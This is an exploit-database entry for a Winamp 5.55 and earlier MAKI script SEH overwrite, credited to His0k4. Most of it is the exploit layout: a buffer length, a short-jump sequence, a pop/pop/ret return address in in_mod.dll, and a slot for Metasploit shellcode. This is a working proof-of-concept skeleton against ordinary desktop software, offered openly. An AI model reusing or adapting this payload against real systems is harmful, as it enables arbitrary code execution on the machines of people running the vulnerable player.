Exploit for unknown platform in category dos / poc
Winamp <= 5.55 (MAKI script) Universal Seh Overwrite PoC
[x] Bug: Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit
[x] Exploited By His0k4
[x] Description: The vulnerabilty is due when parsing a maki script file exactly in the "getRuntimeVersion"
and we can overwrite the seh easily :)
The exploit schema looks like this:
payload = "\x41"*16756
payload += "\x74\x06\x90\x90"
payload += "\x32\x55\xF0\x12" # universal p/p/r in_mod.dll
payload += shellcode # calc shellcode from metasploit
# 0day.today [2018-01-08] #